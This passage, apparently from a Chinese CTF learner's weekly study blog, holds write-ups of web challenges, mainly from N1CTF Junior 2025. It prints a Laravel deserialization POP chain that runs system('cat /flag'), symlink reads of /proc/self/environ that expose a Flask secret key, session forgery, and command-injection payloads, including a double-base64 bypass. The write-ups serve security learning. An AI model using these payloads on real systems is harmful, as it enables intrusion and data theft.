class_">attributes</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="keyword">array</span> <span class="variable">$attributes</span></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>->attributes = <span class="variable">$attributes</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="keyword">namespace</span> <span class="title class_">Illuminate</span>\<span class="title class_">Foundation</span>{</span><br><span class="line"><span class="title class_">class</span> <span class="title class_">Application</span>{</span><br><span class="line"><span class="title class_">protected</span> $<span class="title class_">hasBeenBootstrapped</span> = <span class="title class_">false</span>;</span><br><span class="line"><span class="keyword">protected</span> <span class="variable">$bindings</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$bind</span></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>->bindings=<span class="variable">$bind</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="keyword">namespace</span>{</span><br><span class="line"><span class="title class_">echo</span> <span class="title class_">urlencode</span>(<span class="title class_">serialize</span>(<span class="title class_">new</span> <span class="title class_">Illuminate</span>\<span class="title class_">Foundation</span>\<span class="title class_">Testing</span>\<span class="title class_">PendingComm</span></span><br><span class="line"><span class="title class_">and</span>("<span class="title class_">system</span>",<span class="title class_">array</span>('<span class="title class_">cat</span> /<span class="title class_">flag</span>'),<span class="title class_">new</span> <span class="title class_">Illuminate</span>\<span class="title class_">Auth</span>\<span class="title class_">GenericUser</span>(<span class="title class_">array</span>("<span class="title class_">exp</span></span><br><span class="line"><span class="title class_">ectedOutput</span>"=><span class="title class_">array</span>("0"=>"1"),"<span class="title class_">expectedQuestions</span>"=><span class="title class_">array</span>("0"=>"1"))),<span class="title class_">new</span> <span class="title class_">I</span></span><br><span class="line"><span class="title class_">lluminate</span>\<span class="title class_">Foundation</span>\<span class="title class_">Application</span>(<span class="title class_">array</span>("<span class="title class_">Illuminate</span>\<span class="title class_">Contracts</span>\<span class="title class_">Console</span>\<span class="title class_">Kerne</span></span><br><span class="line"><span class="title class_">l</span>"=><span class="title class_">array</span>("<span class="title class_">concrete</span>"=>"<span class="title class_">Illuminate</span>\<span class="title class_">Foundation</span>\<span class="title class_">Application</span>"))))));</span><br><span class="line"> }</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>完毕,得到flag</p><h1 id="学习计划"><a href="#学习计划" class="headerlink" title="学习计划"></a>学习计划</h1><p>现在的计划是以题型为单位,一个个继续精进,目前大致完成的有文件包含,上传,sql注入,XSS,反序列化等(限CTFshow上的题目练习完毕),下周开始要给点时间学一学JAVA了,然后就是SSTI 和XXE</p><p>之前就想说,现在web题给我的感觉已经不是单纯考一两个知识点了,而是十分有综合性的考察和挑战,因此觉得整体知识的掌握更加重要。一步步好好走吧,脚踏实地十分重要,我也会继续努力的</p><h1 id="第1-5–1-11周"><a href="#第1-5–1-11周" class="headerlink" title="第1.5–1.11周"></a>第1.5–1.11周</h1><p>本周做了两年的N1 junior题,感觉中等偏难,但是很有收获,连续做到的两年的都考了内存,感觉像是之前第三周的时候做的极客大挑战Vibe-SEO的文件描述符,好久之前的知识点没想到在这个地方深化学习了一下,正好在这里总结一下吧</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">/proc/self/mem是一个虚拟文件,代表了进程的整个虚拟地址空间。</span><br><span class="line"></span><br><span class="line">当一个进程使用open("/proc/self/mem", O_RDONLY)时,系统会分配一个FD(文件描述符)给这个打开的文件。</span><br><span class="line"></span><br><span class="line">一旦获得了指向mem的 FD,就可以使用lseek(fd, offset, SEEK_SET)来定位到内存中的具体地址(就是N1 junior题的那个offset),然后使用 read(fd, buf, length) 将内存数据读入缓冲区,进而读取文件</span><br><span class="line"></span><br><span class="line">就像极客大挑战的题中一样,如果拥有一个指向 /proc/self/mem 的 FD,可以通过/proc/self/fd/num来访问</span><br><span class="line">还可以用来通过算地址来读到指定的包含system函数地址文件,写POC达到RCE(2024 N1 junior Gavatar)</span><br></pre></td></tr></table></figure><h2 id="2025-N1CTF-Junior-2-2"><a href="#2025-N1CTF-Junior-2-2" class="headerlink" title="2025 N1CTF Junior 2/2"></a>2025 N1CTF Junior 2/2</h2><h3 id="online-unzipper"><a href="#online-unzipper" class="headerlink" title="online_unzipper"></a>online_unzipper</h3><p>题目是一个在线的zip解压工具,可以猜想到symlink透数据 /proc/self/cmdline</p><p>同样的方法读 /proc/self/environ 拿到FLASK_SECRET_KEY=#mu0cw9F#7bBCoF!</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">HOSTNAME=5ab9cde86ead HOME=/root GPG_KEY=A035C8C19219BA821ECEA86B64E628F8D684696D PYTHON_SHA256=8d3ed8ec5c88c1c95f5e558612a725450d2452813ddad5e58fdb1a53b1209b78 FLASK_APP=app.py FLASK_RUN_HOST=0.0.0.0 PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin LANG=C.UTF-8</span><br></pre></td></tr></table></figure><p>再读app.py拿到源码</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> uuid</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, redirect, url_for,send_file,render_template, session, send_from_directory, abort, Response</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.secret_key = os.environ.get(<span class="string">"FLASK_SECRET_KEY"</span>, <span class="string">"test_key"</span>)</span><br><span class="line">UPLOAD_FOLDER = os.path.join(os.getcwd(), <span class="string">"uploads"</span>)</span><br><span class="line">os.makedirs(UPLOAD_FOLDER, exist_ok=<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line">users = {}</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">"/"</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line"> <span class="keyword">if</span> <span class="string">"username"</span> <span class="keyword">not</span> <span class="keyword">in</span> session:</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">"login"</span>))</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">"upload"</span>))</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">"/register"</span>, methods=[<span class="string">"GET"</span>, <span class="string">"POST"</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">register</span>():</span><br><span class="line"> <span class="keyword">if</span> request.method == <span class="string">"POST"</span>:</span><br><span class="line"> username = request.form[<span class="string">"username"</span>]</span><br><span class="line"> password = request.form[<span class="string">"password"</span>]</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> username <span class="keyword">in</span> users:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"用户名已存在"</span></span><br><span class="line"></span><br><span class="line"> users[username] = {<span class="string">"password"</span>: password, <span class="string">"role"</span>: <span class="string">"user"</span>}</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">"login"</span>))</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">"register.html"</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">"/login"</span>, methods=[<span class="string">"GET"</span>, <span class="string">"POST"</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">login</span>():</span><br><span class="line"> <span class="keyword">if</span> request.method == <span class="string">"POST"</span>:</span><br><span class="line"> username = request.form[<span class="string">"username"</span>]</span><br><span class="line"> password = request.form[<span class="string">"password"</span>]</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> username <span class="keyword">in</span> users <span class="keyword">and</span> users[username][<span class="string">"password"</span>] == password:</span><br><span class="line"> session[<span class="string">"username"</span>] = username</span><br><span class="line"> session[<span class="string">"role"</span>] = users[username][<span class="string">"role"</span>]</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">"upload"</span>))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"用户名或密码错误"</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">"login.html"</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">"/logout"</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">logout</span>():</span><br><span class="line"> session.clear()</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">"login"</span>))</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">"/upload"</span>, methods=[<span class="string">"GET"</span>, <span class="string">"POST"</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">upload</span>():</span><br><span class="line"> <span class="keyword">if</span> <span class="string">"username"</span> <span class="keyword">not</span> <span class="keyword">in</span> session:</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">"login"</span>))</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> request.method == <span class="string">"POST"</span>:</span><br><span class="line"> file = request.files[<span class="string">"file"</span>]</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> file:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"未选择文件"</span></span><br><span class="line"></span><br><span class="line"> role = session[<span class="string">"role"</span>]</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> role == <span class="string">"admin"</span>:</span><br><span class="line"> dirname = request.form.get(<span class="string">"dirname"</span>) <span class="keyword">or</span> <span class="built_in">str</span>(uuid.uuid4())</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> dirname = <span class="built_in">str</span>(uuid.uuid4())</span><br><span class="line"></span><br><span class="line"> target_dir = os.path.join(UPLOAD_FOLDER, dirname)</span><br><span class="line"> os.makedirs(target_dir, exist_ok=<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line"> zip_path = os.path.join(target_dir, <span class="string">"upload.zip"</span>)</span><br><span class="line"> file.save(zip_path)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> os.system(<span class="string">f"unzip -o <span class="subst">{zip_path}</span> -d <span class="subst">{target_dir}</span>"</span>)</span><br><span class="line"> <span class="keyword">except</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"解压失败,请检查文件格式"</span></span><br><span class="line"></span><br><span class="line"> os.remove(zip_path)</span><br><span class="line"> <span class="keyword">return</span> <span class="string">f"解压完成!<br>下载地址: <a href='<span class="subst">{url_for(<span class="string">'download'</span>, folder=dirname)}</span>'><span class="subst">{request.host_url}</span>download/<span class="subst">{dirname}</span></a>"</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">"upload.html"</span>)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">"/download/<folder>"</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">download</span>(<span class="params">folder</span>):</span><br><span class="line"> target_dir = os.path.join(UPLOAD_FOLDER, folder)</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> os.path.exists(target_dir):</span><br><span class="line"> abort(<span class="number">404</span>)</span><br><span class="line"></span><br><span class="line"> files = os.listdir(target_dir)</span><br><span class="line"> <span class="keyword">return</span> render_template(<span class="string">"download.html"</span>, folder=folder, files=files)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">"/download/<folder>/<filename>"</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">download_file</span>(<span class="params">folder, filename</span>):</span><br><span class="line"> file_path = os.path.join(UPLOAD_FOLDER, folder ,filename)</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> <span class="keyword">with</span> <span class="built_in">open</span>(file_path, <span class="string">'r'</span>) <span class="keyword">as</span> file:</span><br><span class="line"> content = file.read()</span><br><span class="line"> <span class="keyword">return</span> Response(</span><br><span class="line"> content,</span><br><span class="line"> mimetype=<span class="string">"application/octet-stream"</span>,</span><br><span class="line"> headers={</span><br><span class="line"> <span class="string">"Content-Disposition"</span>: <span class="string">f"attachment; filename=<span class="subst">{filename}</span>"</span></span><br><span class="line"> }</span><br><span class="line"> )</span><br><span class="line"> <span class="keyword">except</span> FileNotFoundError:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">"File not found"</span>, <span class="number">404</span></span><br><span class="line"> <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">f"Error: <span class="subst">{<span class="built_in">str</span>(e)}</span>"</span>, <span class="number">500</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> app.run(host=<span class="string">"0.0.0.0"</span>)</span><br></pre></td></tr></table></figure><p>修改 session 的 role 为 admin,成为管理员后可指定上传文件的位置</p><p>伪造cookie就行了</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">os.system(f"unzip -o {zip_path} -d {target_dir}")</span><br></pre></td></tr></table></figure><p>其中的target_dir可以通过admin用户来控制</p><p>这里的role是通过session获取的 role = session[“role”]</p><p><img src="C:\Users\18636\AppData\Roaming\Typora\typora-user-images\image-20260111200617102.png" alt="image-20260111200617102"></p><p>这里就可以开始构造命令了test;ls / > /tmp/1.txt</p><p>同样通过软链接读取/tmp/1.txt</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">app</span><br><span class="line">bin</span><br><span class="line">boot</span><br><span class="line">dev</span><br><span class="line">entrypoint.sh</span><br><span class="line">etc</span><br><span class="line">flag-BBv4itllamUqk6K9Y8vOpNQw3wiRZEqX.txt</span><br><span class="line">home</span><br><span class="line">leo</span><br><span class="line">lib</span><br><span class="line">lib64</span><br><span class="line">media</span><br><span class="line">mnt</span><br><span class="line">opt</span><br><span class="line">passwd3</span><br><span class="line">proc</span><br><span class="line">root</span><br><span class="line">run</span><br><span class="line">sbin</span><br><span class="line">srv</span><br><span class="line">sys</span><br><span class="line">tmp</span><br><span class="line">usr</span><br><span class="line">var</span><br></pre></td></tr></table></figure><p> 直接软链接读flag-BBv4itllamUqk6K9Y8vOpNQw3wiRZEqX.txt</p><h3 id="ping"><a href="#ping" class="headerlink" title="ping"></a>ping</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> ipaddress</span><br><span class="line"><span class="keyword">import</span> flask</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">run_ping</span>(<span class="params">ip_base64</span>):</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> decoded_ip = base64.b64decode(ip_base64).decode(<span class="string">'utf-8'</span>)</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> re.<span class="keyword">match</span>(<span class="string">r'^\d+\.\d+\.\d+\.\d+$'</span>, decoded_ip):</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> <span class="keyword">if</span> decoded_ip.count(<span class="string">'.'</span>) != <span class="number">3</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> <span class="built_in">all</span>(<span class="number">0</span> <= <span class="built_in">int</span>(part) < <span class="number">256</span> <span class="keyword">for</span> part <span class="keyword">in</span> decoded_ip.split(<span class="string">'.'</span>)):</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> ipaddress.ip_address(decoded_ip):</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> <span class="keyword">if</span> <span class="built_in">len</span>(decoded_ip) > <span class="number">15</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> re.<span class="keyword">match</span>(<span class="string">r'^[A-Za-z0-9+/=]+$'</span>, ip_base64):</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> command = <span class="string">f"""echo "ping -c 1 $(echo '<span class="subst">{ip_base64}</span>' | base64 -d)" | sh"""</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> process = subprocess.run(</span><br><span class="line"> command,</span><br><span class="line"> shell=<span class="literal">True</span>,</span><br><span class="line"> check=<span class="literal">True</span>,</span><br><span class="line"> capture_output=<span class="literal">True</span>,</span><br><span class="line"> text=<span class="literal">True</span></span><br><span class="line"> )</span><br><span class="line"> <span class="keyword">return</span> process.stdout</span><br><span class="line"> <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line">app = flask.Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/ping'</span>, methods=[<span class="string">'POST'</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">ping</span>():</span><br><span class="line"> data = flask.request.json</span><br><span class="line"> ip_base64 = data.get(<span class="string">'ip_base64'</span>)</span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> ip_base64:</span><br><span class="line"> <span class="keyword">return</span> flask.jsonify({<span class="string">'error'</span>: <span class="string">'no ip'</span>}), <span class="number">400</span></span><br><span class="line"></span><br><span class="line"> result = run_ping(ip_base64)</span><br><span class="line"> <span class="keyword">if</span> result:</span><br><span class="line"> <span class="keyword">return</span> flask.jsonify({<span class="string">'success'</span>: <span class="literal">True</span>, <span class="string">'output'</span>: result}), <span class="number">200</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> flask.jsonify({<span class="string">'success'</span>: <span class="literal">False</span>}), <span class="number">400</span></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/'</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line"> <span class="keyword">return</span> flask.render_template(<span class="string">'index.html'</span>)</span><br><span class="line"></span><br><span class="line">app.run(host=<span class="string">'0.0.0.0'</span>, port=<span class="number">5000</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>过滤只能是<code>ip</code>的正常格式,长度也受限制</p><p>重点关注command = f”””echo “ping -c 1 $(echo ‘{ip_base64}’ | base64 -d)” | sh”””</p><p>ip_base64是,先通过Python的base64库解码校验之后,再经过Linux的命令行解码,而在Python中base64.b64decode不会对<code>=</code>之后的内容继续解码,也就是可以通过两端编码来绕过</p><p>0.0.0.0;cat /flag</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">MC4wLjAuMA==O2NhdCAvZmxhZw==</span><br></pre></td></tr></table></figure><p>拿到flag</p><h3 id="Peek-a-Fork"><a href="#Peek-a-Fork" class="headerlink" title="Peek a Fork"></a>Peek a Fork</h3><p>扫到/entrypoint.sh</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/sh</span><br><span class="line">set -e</span><br><span class="line"></span><br><span class="line">echo "$FLAG" > /app/flag.txt</span><br><span class="line"></span><br><span class="line">unset FLAG</span><br><span class="line"></span><br><span class="line">exec python /app/server.py</span><br></pre></td></tr></table></figure><p>读server.py读到源码</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> fcntl</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> mmap</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">'flag.txt'</span>, <span class="string">'rb'</span>) <span class="keyword">as</span> f:</span><br><span class="line"> flag = f.read()</span><br><span class="line">mm = mmap.mmap(-<span class="number">1</span>, <span class="built_in">len</span>(flag))</span><br><span class="line">mm.write(flag)</span><br><span class="line">os.remove(<span class="string">'flag.txt'</span>)</span><br><span class="line"></span><br><span class="line">FORBIDDEN = [<span class="string">b'flag'</span>, <span class="string">b'proc'</span>, <span class="string">b'<'</span>, <span class="string">b'>'</span>, <span class="string">b'^'</span>, <span class="string">b"'"</span>, <span class="string">b'"'</span>, <span class="string">b'..'</span>, <span class="string">b'./'</span>]</span><br><span class="line">PAGE = <span class="string">"""<!DOCTYPE html></span></span><br><span class="line"><span class="string"><html lang="en"></span></span><br><span class="line"><span class="string"><head></span></span><br><span class="line"><span class="string"> <meta charset="UTF-8"></span></span><br><span class="line"><span class="string"> <meta name="viewport" content="width=device-width, initial-scale=1.0"></span></span><br><span class="line"><span class="string"> <title>Secure Gateway</title></span></span><br><span class="line"><span class="string"> <style></span></span><br><span class="line"><span class="string"> body { font-family: 'Courier New', monospace; background-color: #0c0c0c; color: #00ff00; text-align: center; margin-top: 10%; }</span></span><br><span class="line"><span 